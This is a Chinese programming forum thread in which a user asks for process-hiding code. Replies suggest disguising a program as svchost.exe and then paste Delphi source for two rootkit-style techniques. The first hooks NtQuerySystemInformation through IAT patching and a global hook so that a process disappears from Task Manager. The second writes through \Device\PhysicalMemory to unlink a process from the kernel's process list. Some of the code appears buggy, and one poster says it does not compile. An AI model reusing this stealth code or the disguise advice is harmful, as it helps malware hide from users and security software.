进程隐藏

谁有进程隐藏的代码在网上找了半天都不好用

解决方案 »

免费领取超大流量手机卡，每月29元包185G流量+100分钟通话, 中国电信官方发货

gyk120发表一篇帖子讨论了此问题，你参考一下：http://topic.csdn.net/u/20090803/10/75EF516D-A142-4873-A265-4CAC2466B771.html
现在大部分隐藏进程的代码都不好用了，技术进步了，杀软和hips也能查出来
想了半天把title设置成空，把程序名改成系统进程的名如(svchost.exe)
虽然没隐藏但也能糊弄一下呵呵
三级跳是95的技术，很古老了，2K都可以直接dll注入了，相当于三级跳的升级版
无进程，无模块，Remoteshellcode
http://www.2ccc.com/article.asp?articleid=3763
这个或许对你有帮助，但是程序杀毒报的厉害。(下次多开点嘛。。)
下载不了  现在盒子算是废了自从知道csdn 基本上就告别他了
我的qq1172024793 我在公司上不了qq 发我qq邮箱吧
可以上msn：[email protected]
library lhide;uses
  Windows,
  ImageHlp,
  TlHelp32;type SYSTEM_INFORMATION_CLASS = (
SystemBasicInformation,
SystemProcessorInformation,
SystemPerformanceInformation,
SystemTimeOfDayInformation,
SystemNotImplemented1,
SystemProcessesAndThreadsInformation,
SystemCallCounts,
SystemConfigurationInformation,
SystemProcessorTimes,
SystemGlobalFlag,
SystemNotImplemented2,
SystemModuleInformation,
SystemLockInformation,
SystemNotImplemented3,
SystemNotImplemented4,
SystemNotImplemented5,
SystemHandleInformation,
SystemObjectInformation,
SystemPagefileInformation,
SystemInstructionEmulationCounts,
SystemInvalidInfoClass1,
SystemCacheInformation,
SystemPoolTagInformation,
SystemProcessorStatistics,
SystemDpcInformation,
SystemNotImplemented6,
SystemLoadImage,
SystemUnloadImage,
SystemTimeAdjustment,
SystemNotImplemented7,
SystemNotImplemented8,
SystemNotImplemented9,
SystemCrashDumpInformation,
SystemExceptionInformation,
SystemCrashDumpStateInformation,
SystemKernelDebuggerInformation,
SystemContextSwitchInformation,
SystemRegistryQuotaInformation,
SystemLoadAndCallImage,
SystemPrioritySeparation,
SystemNotImplemented10,
SystemNotImplemented11,
SystemInvalidInfoClass2,
SystemInvalidInfoClass3,
SystemTimeZoneInformation,
SystemLookasideInformation,
SystemSetTimeSlipEvent,
SystemCreateSession,
SystemDeleteSession,
SystemInvalidInfoClass4,
SystemRangeStartInformation,
SystemVerifierInformation,
SystemAddVerifier,
SystemSessionProcessesInformation
);_IMAGE_IMPORT_DESCRIPTOR = packed record
case integer of
  0:(Characteristics: DWORD);
  1:(OriginalFirstThunk:DWORD; TimeDateStamp:DWORD; ForwarderChain: DWORD; Name: DWORD; FirstThunk: DWORD);
end;
IMAGE_IMPORT_DESCRIPTOR=_IMAGE_IMPORT_DESCRIPTOR;
PIMAGE_IMPORT_DESCRIPTOR=^IMAGE_IMPORT_DESCRIPTOR;PFARPROC=^FARPROC;procedure ReplaceIATEntryInOneMod(pszCallerModName: Pchar; pfnCurrent: FarProc; pfnNew: FARPROC; hmodCaller: hModule);
var
  ulSize: ULONG;
  pImportDesc: PIMAGE_IMPORT_DESCRIPTOR;
  pszModName: PChar;
  pThunk: PDWORD; ppfn:PFARPROC;
  ffound: LongBool;
  written: DWORD;
begin
  pImportDesc:= ImageDirectoryEntryToData(Pointer(hmodCaller), TRUE,IMAGE_DIRECTORY_ENTRY_IMPORT, ulSize);
  if pImportDesc = nil then
    exit;
  while pImportDesc.Name <> 0 do begin
    pszModName := PChar(hmodCaller + pImportDesc.Name);
    if (lstrcmpiA(pszModName, pszCallerModName) = 0) then
      break;
    Inc(pImportDesc);
  end;
  if (pImportDesc.Name = 0) then
    exit;
  pThunk := PDWORD(hmodCaller + pImportDesc.FirstThunk);
  while pThunk^ <> 0 do begin
    ppfn := PFARPROC(pThunk);
    fFound := (ppfn^ = pfnCurrent);
    if (fFound) then begin
      VirtualProtectEx(GetCurrentProcess,ppfn,4,PAGE_EXECUTE_READWRITE,written);
      WriteProcessMemory(GetCurrentProcess, ppfn, @pfnNew, sizeof(pfnNew), Written);
      exit;
    end;
    Inc(pThunk);
  end;
end;var
  addr_NtQuerySystemInformation: Pointer;
  mypid: DWORD;
  fname: PCHAR;
  mapaddr: PDWORD;
  hideOnlyTaskMan: PBOOL;function myNtQuerySystemInfo(SystemInformationClass: SYSTEM_INFORMATION_CLASS; SystemInformation: Pointer;
SystemInformationLength:ULONG; ReturnLength:PULONG):LongInt; stdcall;
label onceagain, getnextpidstruct, quit, fillzero;
asm
  push ReturnLength
  push SystemInformationLength
  push SystemInformation
  push dword ptr SystemInformationClass
  call dword ptr [addr_NtQuerySystemInformation]
  or eax,eax
  jl quit
  cmp SystemInformationClass, SystemProcessesAndThreadsInformation
  jne quit  onceagain:
  mov esi, SystemInformation  getnextpidstruct:
  mov ebx, esi
  cmp dword ptr [esi],0
  je quit
  add esi, [esi]
  mov ecx, [esi+44h]
  cmp ecx, mypid
  jne getnextpidstruct
  mov edx, [esi]
  test edx, edx
  je fillzero
  add [ebx], edx
  jmp onceagain  fillzero:
  and [ebx], edx
  jmp onceagain  quit:
  mov Result, eax
end;procedure InterceptFunctions;
var
  hSnapShot: THandle;
  me32: MODULEENTRY32;
begin
  addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
  hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
  if hSnapshot=INVALID_HANDLE_VALUE then
    exit;
  try
    ZeroMemory(@me32,sizeof(MODULEENTRY32));
    me32.dwSize:=sizeof(MODULEENTRY32);
    Module32First(hSnapShot,me32);
    repeat
      ReplaceIATEntryInOneMod('ntdll.dll',addr_NtQuerySystemInformation,@MyNtQuerySystemInfo,me32.hModule);
    until not Module32Next(hSnapShot,me32);
  finally
    CloseHandle(hSnapShot);
  end;
end;procedure UninterceptFunctions;
var
  hSnapShot: THandle;
  me32: MODULEENTRY32;
begin
  addr_NtQuerySystemInformation:=GetProcAddress(getModuleHandle('ntdll.dll'),'NtQuerySystemInformation');
  hSnapShot:=CreateToolHelp32SnapShot(TH32CS_SNAPMODULE,GetCurrentProcessId);
  if hSnapshot=INVALID_HANDLE_VALUE then exit;
  try
    ZeroMemory(@me32,sizeof(MODULEENTRY32));
    me32.dwSize:=sizeof(MODULEENTRY32);
    Module32First(hSnapShot,me32);
  repeat
    ReplaceIATEntryInOneMod('ntdll.dll',@MyNtQuerySystemInfo,addr_NtQuerySystemInformation,me32.hModule);
  until not Module32Next(hSnapShot,me32);
  finally
    CloseHandle(hSnapShot);
  end;
end;
var HookHandle: THandle;function CbtProc(code: integer; wparam: integer; lparam: integer):Integer; stdcall;
begin
  Result:=0;
end;procedure InstallHook; stdcall;
begin
  HookHandle := SetWindowsHookEx(WH_CBT, @CbtProc, HInstance, 0);
end;var hFirstMapHandle:THandle;procedure HideProcess(pid:DWORD); stdcall;
var
  addrMap: PDWORD;
  ptr2: PBOOL;
begin
  mypid:=0;
  hFirstMapHandle:=CreateFileMapping($FFFFFFFF,nil,PAGE_READWRITE,0,8,'NtHideFileMapping');
  if hFirstMapHandle=0 then
    exit;
  addrMap:=MapViewOfFile(hFirstMapHandle,FILE_MAP_WRITE,0,0,8);
  if addrMap=nil then begin
    CloseHandle(hFirstMapHandle);
    exit;
  end;
  addrMap^:=pid;
  ptr2:=PBOOL(DWORD(addrMap)+4);
  ptr2^:= false;
  UnmapViewOfFile(addrMap);
  InstallHook;
end;exports
  HideProcess;var
  hmap: THandle;procedure LibraryProc(Reason: Integer);
begin
  if Reason = DLL_PROCESS_DETACH then
    if mypid > 0 then
      UninterceptFunctions()
    else
      CloseHandle(hFirstMapHandle);
end;function ExtractFileName(APath:string): string;
var
  LI,LJ: Integer;
begin
  if Length(APath)<>0 then begin
    LJ:=0;
    for LI:=Length(APath) downto 1 do
      if APath[LI]='\' then begin
        LJ:=LI;
        Break;
      end;
    Result:=Copy(APath,LJ+1,MaxInt);
  end
  else
    Result := '';
end;function AllocMem(Size: Cardinal): Pointer;
begin
  GetMem(Result, Size);
  FillChar(Result^, Size, 0);
end;begin
  hmap:=OpenFileMapping(FILE_MAP_READ,false,'NtHideFileMapping');
  if hmap=0 then
    exit;
  try
    mapaddr:=MapViewOfFile(hmap,FILE_MAP_READ,0,0,0);
  if mapaddr=nil then
    exit;
  mypid:=mapaddr^;
  hideOnlyTaskMan:=PBOOL(DWORD(mapaddr)+4);
  if hideOnlyTaskMan^ then begin
    fname:=allocMem(MAX_PATH+1);
    GetModuleFileName(GetModuleHandle(nil),fname,MAX_PATH+1);
    if not (ExtractFileName(fname)='taskmgr.exe') then
      exit;
  end;
  InterceptFunctions;
  finally
    UnmapViewOfFile(mapaddr);
    CloseHandle(Hmap);
    DLLProc:=@LibraryProc;
  end;
end.program load;
uses windows;
var
VHideProcess:procedure(pid:DWORD); stdcall;
procedure HideProcess(pid:DWORD); stdcall;
var
  hget:THandle;
begin
  hget := LoadLibrary('lhide.dll');
  @VHideProcess := GetProcAddress(hget, 'HideProcess');
  VHideProcess(pid);
end;
begin
  HideProcess(GetCurrentProcessId);
  while True do Sleep(1);
end.
unit UnitHideProcess;interfaceuses
Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls,
Forms, Dialogs, Registry, ComCtrls, StrUtils, StdCtrls,
ToolWin, Menus, ImgList, ActnList, IniFiles, CheckLst, FileCtrl, Aclapi,
Accctrl;
type
NTSTATUS=Longint;
USHORT =Byte;
PWSTR=PWidechar;
ULONG= Cardinal;
HANDLE=Pointer;
PVOID=Pointer;
PCWSTR=PWidechar;
PULONG=^ULONG ;
HMODULE=THANDLE;const
STATUS_ACCESS_DENIED = $C0000022 ;
RSP_SIMPLE_SERVICE = $00000001;
RSP_UNREGISTER_SERVICE = $00000000 ;
type
_UNICODE_STRING= record
Length:USHORT ;
MaximumLength: USHORT;
Buffer:PWSTR;
end;
UNICODE_STRING= _UNICODE_STRING;
PUNICODE_STRING =^ _UNICODE_STRING ;_OBJECT_ATTRIBUTES =record
Length:ULONG ;
RootDirectory:HANDLE;
ObjectName:PUNICODE_STRING;
Attributes:ULONG;
SecurityDescriptor:PVOID;
SecurityQualityOfService:PVOID ;
end;
OBJECT_ATTRIBUTES=_OBJECT_ATTRIBUTES ;
POBJECT_ATTRIBUTES=^_OBJECT_ATTRIBUTES; ZWOPENSECTION=function(
SectionHandle:PInteger;
DesiredAccess:ACCESS_MASK;
ObjectAttributes :POBJECT_ATTRIBUTES
): NTSTATUS; stdcall;
RTLINITUNICODESTRING=procedure(
DestinationString:PUNICODE_STRING;
SourceString :PCWSTR
);stdcall;TMyHideProcess=class
private
OSversion:Longint;
RtlInitUnicodeString:RTLINITUNICODESTRING ;
ZwOpenSection:ZWOPENSECTION;
g_hNtDLL: HMODULE;
g_pMapPhysicalMemory:PVOID;
g_hMPM :THANDLE ;
function InitNTDLL():bool;
procedure CloseNTDLL();
procedure SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
function OpenPhysicalMemory():THANDLE ;
function LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
function GetData(addr:PVOID ):ULONG;
function SetData( addr:PVOID; data:ULONG):bool;
function HideProcess2000():bool;
procedure HideProcess98();
public
constructor Create( theosver:Longint);
destructor Destroy();
procedure DoHideMe();
end; implementationconstructor TMyHideProcess.Create( theosver:Longint);
begin
OSversion:=theosver;
end;
destructor TMyHideProcess.Destroy();
begin
CloseNTDLL();
end;
procedure TMyHideProcess.DoHideMe();
begin
case (OSversion) of
98:
HideProcess98();
2000:
HideProcess2000();
end;
end; function TMyHideProcess.InitNTDLL():bool;
var
a:Longint;
begin
g_hNtDLL := 0;
g_pMapPhysicalMemory := nil;
g_hMPM := 0;
g_hNtDLL := LoadLibrary( 'ntdll.dll' );
if (g_hNtDLL=0 ) then
begin
result:= FALSE;
exit;
end;
@RtlInitUnicodeString :=
GetProcAddress( g_hNtDLL, 'RtlInitUnicodeString'); @ZwOpenSection :=
GetProcAddress( g_hNtDLL, 'ZwOpenSection'); result:= TRUE;
end;
procedure TMyHideProcess.CloseNTDLL();
begin
if(g_hNtDLL <>0 ) then
begin
FreeLibrary(g_hNtDLL);
end;
end;
procedure TMyHideProcess.SetPhyscialMemorySectionCanBeWrited( hSection:THANDLE) ;
label CleanUp;
var
pDacl,pNewDacl: PACL ;
pSD: PPSECURITY_DESCRIPTOR ;
dwRes : DWORD;
ea:EXPLICIT_ACCESS;begin
pDacl:=nil;
pNewDacl :=nil;
pSD:=nil; dwRes:=GetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION,
nil,nil,pDacl,nil,pSD); if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end;
ZeroMemory(@ea, sizeof(EXPLICIT_ACCESS));
ea.grfAccessPermissions := SECTION_MAP_WRITE;
ea.grfAccessMode := GRANT_ACCESS;
ea.grfInheritance:= NO_INHERITANCE;
ea.Trustee.TrusteeForm := TRUSTEE_IS_NAME;
ea.Trustee.TrusteeType := TRUSTEE_IS_USER;
ea.Trustee.ptstrName := 'CURRENT_USER'; dwRes:=SetEntriesInAcl(1,@ea,pDacl,pNewDacl) ;
if(dwRes<> ERROR_SUCCESS) then
begin
goto CleanUp;
end; dwRes:=SetSecurityInfo(hSection,SE_KERNEL_OBJECT,DACL_SECURITY_INFORMATION, nil,nil,pNewDacl,nil); if(dwRes<>ERROR_SUCCESS) then
begin
goto CleanUp;
end; CleanUp: if(pSD<>nil) then
LocalFree(Ulong(pSD));
if(pNewDacl<>nil) then
LocalFree(Ulong(pNewDacl));end; function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
status: NTSTATUS ;
physmemString:UNICODE_STRING;
attributes:OBJECT_ATTRIBUTES;
begin
RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory')); attributes.Length := sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil; status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes); if(status = STATUS_ACCESS_DENIED) then
begin
status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
end; if status=0 then
begin
result:= 0;
exit;
end; g_pMapPhysicalMemory := MapViewOfFile(
g_hMPM,
4,
0,
$30000,
$1000); if( g_pMapPhysicalMemory = nil ) then
begin
result:=0;
exit ;
end; result:= g_hMPM;end;
//-------------------------对付数组指针---------------------------------
type
TArrayULONG = array [0..0] of ULONG;
PTArrayULONG= ^TArrayULONG; //----------------------------------------------------------
function TMyHideProcess.LinearToPhys(BaseAddress:PULONG ; addr:PVOID):PVOID;
var
VAddr,PGDE,PTE,PAddr,tmp:ULONG;
_PGDE:PULONG; begin
VAddr:=ULONG(addr);
PGDE:=PTArrayULONG(BaseAddress)^[VAddr shr 22];
if ((PGDE and 1)<>0) then
begin
tmp:=PGDE and $00000080;
if (tmp<>0) then
begin
PAddr:=(PGDE and $FFC00000)+(VAddr and $003FFFFF);
end
else
begin
PGDE:=ULONG(MapViewOfFile(g_hMPM, 4, 0, PGDE and $fffff000, $1000));
_PGDE:=PULONG(PGDE);
PTE:=PTArrayULONG(_PGDE)^[(VAddr and $003FF000) shr 12];
if ((PTE and 1)<>0) then
begin
PAddr:=(PTE and $FFFFF000)+(VAddr and $00000FFF);
UnmapViewOfFile(PVOID(PGDE));
end
else
begin
result:= 0;
exit;
end;
end;
end
else
begin
result:= 0;
exit;
end;
result:=PVOID(PAddr);
end;
function
TMyHideProcess.GetData(addr:PVOID ):ULONG;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, 4, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:=0;
exit;
end;
ret:=PTArrayULONG(tmp)^[(phys and $FFF) shr 2];
UnmapViewOfFile(tmp);
result:=ret;
end;
function TMyHideProcess.SetData( addr:PVOID; data:ULONG):bool;
var
phys,ret: ULONG;
tmp: PULONG ;
begin
phys:=ULONG(LinearToPhys(PULONG(g_pMapPhysicalMemory),PVOID(addr)));
tmp:=PULONG(MapViewOfFile(g_hMPM, FILE_MAP_WRITE, 0, phys and $fffff000, $1000));
if (tmp<>nil) then
begin
result:= FALSE;
exit;
end;
PTArrayULONG(tmp)^[(phys and $FFF) shr 2]:=data;
UnmapViewOfFile(tmp);
result:= TRUE;
end; function TMyHideProcess.HideProcess2000():bool;
var
thread, process ,fw ,bw :ULONG;begin
if InitNTDLL() then
begin
if (OpenPhysicalMemory()=0) then
begin
result:= FALSE;
exit;
end;
thread:=GetData(PVOID($FFDFF124));
process:=GetData(PVOID(thread+$22c));
fw:=GetData(PVOID(process+$a0));
bw:=GetData(PVOID(process+$a4));
SetData(PVOID(fw+4),bw);
SetData(PVOID(bw),fw);
UnmapViewOfFile(g_pMapPhysicalMemory);
CloseHandle(g_hMPM);
CloseNTDLL();
end;
result:= TRUE;end;
procedure TMyHideProcess.HideProcess98();
type pRegisterService=function (a,b:DWORD):boolean; stdcall;
var
hKernel : HMODULE ;
RegisterService: pRegisterService ;
begin
hKernel := LoadLibrary('kernel32.dll');
if(hKernel>0) then
begin
@RegisterService :=GetProcAddress(hKernel,'RegisterServiceProcess');
RegisterService(GetCurrentProcessId(),RSP_SIMPLE_SERVICE);
FreeLibrary(hKernel);
hKernel :=0;
end;
end; end.
function TMyHideProcess.OpenPhysicalMemory():THANDLE ;
var
status: NTSTATUS ;
physmemString:UNICODE_STRING;
attributes:OBJECT_ATTRIBUTES;
begin
RtlInitUnicodeString(@physmemString, PCWSTR('\\Device\\PhysicalMemory'));attributes.Length := sizeof(OBJECT_ATTRIBUTES);
attributes.RootDirectory := nil;
attributes.ObjectName := @physmemString;
attributes.Attributes := 0;
attributes.SecurityDescriptor := nil;
attributes.SecurityQualityOfService := nil;  status := ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);  if(status = STATUS_ACCESS_DENIED) then
begin
status := ZwOpenSection(@g_hMPM,READ_CONTROL or WRITE_DAC,@attributes);
SetPhyscialMemorySectionCanBeWrited(g_hMPM);
CloseHandle(g_hMPM);
status :=ZwOpenSection(@g_hMPM,SECTION_MAP_READ or SECTION_MAP_WRITE,@attributes);
end;  if status=0 then
begin
result:= 0;
exit;
end;  g_pMapPhysicalMemory := MapViewOfFile(
g_hMPM,
4,
0,
$30000,
$1000);  if( g_pMapPhysicalMemory = nil ) then
begin
result:=0;
exit ;
end;  result:= g_hMPM;end;
楼上的在不
红色的编译不过去